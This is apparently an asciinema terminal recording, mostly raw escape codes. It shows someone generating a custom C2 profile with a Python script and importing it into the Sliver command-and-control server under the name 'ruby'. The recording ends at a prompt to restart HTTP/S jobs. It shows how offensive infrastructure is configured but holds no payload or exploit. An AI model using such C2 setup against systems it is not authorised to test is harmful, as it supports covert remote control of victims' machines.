"\u001b[1m\u001b[32mexit\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[13D\u001b[9C\u001b[272D\u001b[13C\u001b[?25h"] +[17.626637, "o", "\u001b[13D\u001b[9C\u001b[6n"] +[17.642436, "o", "\u001b[272D\u001b[13C\u001b[0J\u001b[272D\r\r\n"] +[17.646867, "o", "\u001b[0 q\r\n"] +[17.660633, "o", "Exiting...\r\n"] +[17.682692, "o", "# "] +[22.445159, "o", "python3 generateC2Profile.py default_c2profile ror _session_id"] +[25.608935, "o", "\r\n"] +[25.851413, "o", "C2 Profile updated !\r\n"] +[25.865598, "o", "# "] +[28.138618, "o", "."] +[28.237052, "o", "/"] +[28.503577, "o", "s"] +[28.591085, "o", "l"] +[28.642169, "o", "i"] +[28.769198, "o", "v"] +[28.886529, "o", "e"] +[29.031073, "o", "r"] +[29.250302, "o", "-"] +[29.411579, "o", "s"] +[29.455372, "o", "e"] +[29.5209, "o", "r"] +[29.745856, "o", "v"] +[29.863682, "o", "e"] +[29.949355, "o", "r"] +[30.06486, "o", "\r\n"] +[31.221878, "o", "\u001b[1m\u001b[37m\r\r\n.------..------..------..------..------..------.\r\r\n|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |\r\r\n| :/\\: || :/\\: || (\\/) || :(): || (\\/) || :(): |\r\r\n| :\\/: || (__) || :\\/: || ()() || :\\/: || ()() |\r\r\n| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|\r\r\n`------'`------'`------'`------'`------'`------'\r\r\n\u001b[0m\r\n"] +[31.225435, "o", "All hackers gain indestructible\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mServer v1.5.39 - ba3893980d1ca5e4ae4089eb4c87e9f5ba389119 - \u001b[1mDirty\u001b[0m\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mWelcome to the sliver shell, please type 'help' for options\r\r\n\r\n"] +[31.25069, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[31.252324, "o", "\u001b[1 q"] +[31.254311, "o", "\u001b[?25l"] +[31.255494, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[31.258725, "o", "\u001b[0m\u001b[0K\u001b[49m"] +[31.259539, "o", "\r\r\n"] +[31.260445, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[9D\u001b[9C\u001b[272D\u001b[9C\u001b[?25h"] +[31.828318, "o", "\u001b[?25l"] +[31.831247, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[31.848297, "o", "c\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[10D\u001b[9C\u001b[272D\u001b[10C"] +[31.848681, "o", "\u001b[?25h"] +[32.026532, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[32.03955, "o", "c2\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[11D\u001b[9C\u001b[272D\u001b[11C\u001b[?25h"] +[32.233435, "o", "\u001b[?25l\u001b[272D"] +[32.236205, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[32.248591, "o", "c2p\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[32.250298, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[12D\u001b[9C\u001b[272D\u001b[12C\u001b[?25h"] +[32.36383, "o", "\u001b[?25l"] +[32.369252, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[32.389164, "o", "c2pr\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[32.390349, "o", "\u001b[272D\u001b[1A\u001b[13D\u001b[9C\u001b[272D\u001b[13C\u001b[?25h"] +[32.444907, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[32.447494, "o", "\u001b[6n"] +[32.454331, "o", "c2pro\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[32.456411, "o", "\u001b[272D\u001b[1A\u001b[14D\u001b[9C\u001b[272D\u001b[14C\u001b[?25h"] +[32.603502, "o", "\u001b[?25l"] +[32.612524, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[32.621382, "o", "c2prof\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[32.623513, "o", "\u001b[272D\u001b[1A\u001b[15D\u001b[9C\u001b[272D\u001b[15C\u001b[?25h"] +[32.676813, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[32.678606, "o", "\u001b[6n"] +[32.685147, "o", "c2profi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[32.685369, "o", "\u001b[0J\u001b[272D\u001b[1A\u001b[16D\u001b[9C\u001b[272D\u001b[16C\u001b[?25h"] +[32.76993, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[32.786995, "o", "c2profil\u001b[0m\u001b[0K\u001b[49m\r"] +[32.787801, "o", "\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[17D\u001b[9C\u001b[272D\u001b[17C\u001b[?25h"] +[32.837751, "o", "\u001b[?25l"] +[32.838328, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[32.847406, "o", "c2profile\u001b[0m\u001b[0K\u001b[49m"] +[32.849497, "o", "\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[18D\u001b[9C\u001b[272D\u001b[18C\u001b[?25h"] +[32.879614, "o", "\u001b[?25l\u001b[272D"] +[32.880209, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[32.886002, "o", "\u001b[1m\u001b[32mc2profiles\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[19D\u001b[9C\u001b[272D\u001b[19C\u001b[?25h"] +[33.018785, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[33.039192, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[33.039837, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[20D\u001b[9C\u001b[272D\u001b[20C\u001b[?25h"] +[33.399545, "o", "\u001b[?25l"] +[33.410284, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[33.424596, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D"] +[33.425546, "o", "\u001b[1A\u001b[21D\u001b[9C\u001b[272D\u001b[21C\u001b[?25h"] +[33.492157, "o", "\u001b[?25l"] +[33.4954, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[33.501657, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mim\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[33.503608, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[22D\u001b[9C\u001b[272D\u001b[22C\u001b[?25h"] +[33.656374, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[33.678317, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimp\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[23D\u001b[9C\u001b[272D\u001b[23C\u001b[?25h"] +[33.715316, "o", "\u001b[?25l"] +[33.717377, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[33.725518, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimpo\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[33.726923, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[24D\u001b[9C\u001b[272D\u001b[24C\u001b[?25h"] +[33.840438, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[33.854711, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimpor\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[33.855398, "o", "\u001b[272D\u001b[1A\u001b[25D\u001b[9C\u001b[272D\u001b[25C\u001b[?25h"] +[33.935524, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[33.942502, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[33.945125, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[26D\u001b[9C\u001b[272D\u001b[26C\u001b[?25h"] +[34.014432, "o", "\u001b[?25l\u001b[272D"] +[34.018536, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[34.027, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[27D"] +[34.027665, "o", "\u001b[9C\u001b[272D\u001b[27C\u001b[?25h"] +[34.558606, "o", "\u001b[?25l"] +[34.560369, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[34.568695, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[34.569739, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[28D\u001b[9C\u001b[272D\u001b[28C\u001b[?25h"] +[34.805492, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[34.818651, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-h\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[29D\u001b[9C\u001b[272D\u001b[29C\u001b[?25h"] +[35.080587, "o", "\u001b[29D\u001b[9C"] +[35.085609, "o", "\u001b[6n"] +[35.096589, "o", "\u001b[272D"] +[35.09685, "o", "\u001b[29C\u001b[0J\u001b[272D\r\r\n"] +[35.103594, "o", "\u001b[0 q"] +[35.107707, "o", "\r\n"] +[35.12822, "o", "Import HTTP C2 profile\r\n\r\n"] +[35.136333, "o", "Usage:\r\n c2profiles import [flags]\r\n\r\nFlags:\r\n -f, --file string Path to C2 configuration file to import\r\n -h, --help help for import\r\n -n, --name string HTTP C2 Profile name (default \"default\")\r\n -o, --overwrite Overwrite profile if it exists\r\n"] +[35.137237, "o", "\r\n"] +[35.14667, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[35.147151, "o", "\u001b[1 q\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[35.149729, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[9D\u001b[9C\u001b[272D\u001b[9C\u001b[?25h"] +[35.551746, "o", "\u001b[?25l"] +[35.55409, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[35.561774, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-h\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m"] +[35.562346, "o", "\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[29D\u001b[9C\u001b[272D\u001b[29C\u001b[?25h"] +[36.39638, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[36.412781, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[36.415352, "o", "\u001b[272D\u001b[1A\u001b[28D\u001b[9C\u001b[272D\u001b[28C\u001b[?25h"] +[36.679571, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[36.689876, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D"] +[36.692777, "o", "\u001b[1A\u001b[29D\u001b[9C\u001b[272D\u001b[29C\u001b[?25h"] +[36.787773, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[36.80321, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[30D"] +[36.805388, "o", "\u001b[9C\u001b[272D\u001b[30C\u001b[?25h"] +[37.045357, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[37.055753, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22md\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[37.056147, "o", "\u001b[0J\u001b[272D\u001b[1A\u001b[31D\u001b[9C\u001b[272D\u001b[31C\u001b[?25h"] +[37.092415, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[37.092771, "o", "\u001b[6n"] +[37.100319, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mde\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A"] +[37.104532, "o", "\u001b[32D\u001b[9C\u001b[272D\u001b[32C\u001b[?25h"] +[37.221831, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[37.242747, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdef\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[37.243834, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[33D\u001b[9C\u001b[272D\u001b[33C\u001b[?25h"] +[37.33546, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[37.349443, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefa\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[34D"] +[37.350242, "o", "\u001b[9C\u001b[272D\u001b[34C\u001b[?25h"] +[37.410583, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[37.416881, "o", "\u001b[6n"] +[37.428427, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefau\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D"] +[37.428609, "o", "\u001b[1A\u001b[35D\u001b[9C\u001b[272D\u001b[35C\u001b[?25h"] +[37.462408, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[37.463469, "o", "\u001b[6n"] +[37.467562, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefaul\u001b[0m\u001b[0K\u001b[49m\r"] +[37.468823, "o", "\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[36D\u001b[9C\u001b[272D\u001b[36C\u001b[?25h"] +[37.59543, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[37.60619, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[37.609401, "o", "\u001b[272D\u001b[1A\u001b[37D\u001b[9C\u001b[272D\u001b[37C\u001b[?25h"] +[37.914869, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[37.937955, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[37.939934, "o", "\u001b[272D\u001b[1A\u001b[38D\u001b[9C\u001b[272D\u001b[38C\u001b[?25h"] +[38.222001, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[38.234905, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[38.235707, "o", "\u001b[272D\u001b[1A\u001b[39D\u001b[9C\u001b[272D\u001b[39C\u001b[?25h"] +[38.400472, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[38.41496, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[38.415386, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[40D\u001b[9C\u001b[272D\u001b[40C\u001b[?25h"] +[38.574407, "o", "\u001b[?25l"] +[38.575144, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[38.58185, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2p\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D"] +[38.583772, "o", "\u001b[1A\u001b[41D\u001b[9C\u001b[272D\u001b[41C\u001b[?25h"] +[38.668223, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[38.679539, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2pr\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[38.68028, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[42D\u001b[9C\u001b[272D\u001b[42C\u001b[?25h"] +[38.77467, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[38.785174, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2pro\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[38.785631, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[43D\u001b[9C\u001b[272D\u001b[43C\u001b[?25h"] +[38.89326, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[38.898343, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2prof\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[38.899929, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[44D\u001b[9C\u001b[272D\u001b[44C\u001b[?25h"] +[38.967681, "o", "\u001b[?25l\u001b[272D"] +[38.969536, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[38.979525, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2profi\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[38.980535, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[45D\u001b[9C\u001b[272D\u001b[45C\u001b[?25h"] +[39.022552, "o", "\u001b[?25l\u001b[272D"] +[39.022873, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[39.02837, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2profil\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[46D\u001b[9C"] +[39.030542, "o", "\u001b[272D\u001b[46C\u001b[?25h"] +[39.088579, "o", "\u001b[?25l\u001b[272D"] +[39.089001, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[39.095252, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2profile\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[47D\u001b[9C\u001b[272D\u001b[47C\u001b[?25h"] +[39.2076, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[39.222643, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2profile \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[48D\u001b[9C"] +[39.224495, "o", "\u001b[272D\u001b[48C\u001b[?25h"] +[39.469353, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[39.476682, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2profile \u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[39.478613, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[49D\u001b[9C\u001b[272D\u001b[49C\u001b[?25h"] +[39.756896, "o", "\u001b[?25l"] +[39.758744, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[39.766387, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2profile \u001b[1m\u001b[38;05;244m-n\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[39.767647, "o", "\u001b[0J\u001b[272D\u001b[1A\u001b[50D\u001b[9C\u001b[272D\u001b[50C\u001b[?25h"] +[39.895335, "o", "\u001b[?25l"] +[39.895941, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[39.912461, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2profile \u001b[1m\u001b[38;05;244m-n \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[39.91286, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[51D\u001b[9C\u001b[272D\u001b[51C\u001b[?25h"] +[40.073684, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[40.075728, "o", "\u001b[6n"] +[40.08134, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2profile \u001b[1m\u001b[38;05;244m-n \u001b[39m\u001b[22mr\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[40.081568, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[52D\u001b[9C\u001b[272D\u001b[52C\u001b[?25h"] +[40.131466, "o", "\u001b[?25l\u001b[272D"] +[40.13189, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[40.13909, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2profile \u001b[1m\u001b[38;05;244m-n \u001b[39m\u001b[22mru\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[53D"] +[40.139397, "o", "\u001b[9C\u001b[272D\u001b[53C\u001b[?25h"] +[40.258919, "o", "\u001b[?25l"] +[40.259556, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[40.26376, "o", "\u001b[6n"] +[40.278483, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2profile \u001b[1m\u001b[38;05;244m-n \u001b[39m\u001b[22mrub\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[40.279502, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[54D\u001b[9C\u001b[272D\u001b[54C\u001b[?25h"] +[40.393796, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[40.397861, "o", "\u001b[6n"] +[40.415177, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2profile \u001b[1m\u001b[38;05;244m-n \u001b[39m\u001b[22mruby\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[40.417477, "o", "\u001b[272D\u001b[1A\u001b[55D\u001b[9C\u001b[272D\u001b[55C\u001b[?25h"] +[40.642533, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[40.649219, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2profile \u001b[1m\u001b[38;05;244m-n \u001b[39m\u001b[22mruby \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[56D\u001b[9C\u001b[272D\u001b[56C\u001b[?25h"] +[41.224521, "o", "\u001b[?25l"] +[41.231473, "o", "\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[41.248213, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2profile \u001b[1m\u001b[38;05;244m-n \u001b[39m\u001b[22mruby \u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[41.249567, "o", "\u001b[272D\u001b[1A\u001b[57D\u001b[9C\u001b[272D\u001b[57C\u001b[?25h"] +[42.074388, "o", "\u001b[?25l\u001b[272D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[42.08925, "o", "\u001b[6n"] +[42.098852, "o", "\u001b[1m\u001b[32mc2profiles \u001b[39m\u001b[22mimport \u001b[1m\u001b[38;05;244m-f \u001b[39m\u001b[22mdefault_c2profile \u001b[1m\u001b[38;05;244m-n \u001b[39m\u001b[22mruby \u001b[1m\u001b[38;05;244m-o\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[42.099432, "o", "\u001b[0K\u001b[0J\u001b[272D\u001b[1A\u001b[58D\u001b[9C\u001b[272D\u001b[58C\u001b[?25h"] +[42.897783, "o", "\u001b[58D\u001b[9C"] +[42.901519, "o", "\u001b[6n"] +[42.908676, "o", "\u001b[272D\u001b[58C\u001b[0J"] +[42.908794, "o", "\u001b[272D\r\r\n"] +[42.911002, "o", "\u001b[0 q\r\n"] +[42.990316, "o", "\u001b[0G"] +[42.990462, "o", "\u001b[2K"] +[42.993166, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mRestart HTTP/S jobs? \u001b[0m\u001b[0;37m(y/N) \u001b[0m"] +[42.993645, "o", "\u001b[?25l\u001b7\u001b[999;999f\u001b[6n"] +[42.995378, "o", "\u001b8"] +[42.995893, "o", "\u001b[?25h\u001b[6n"] 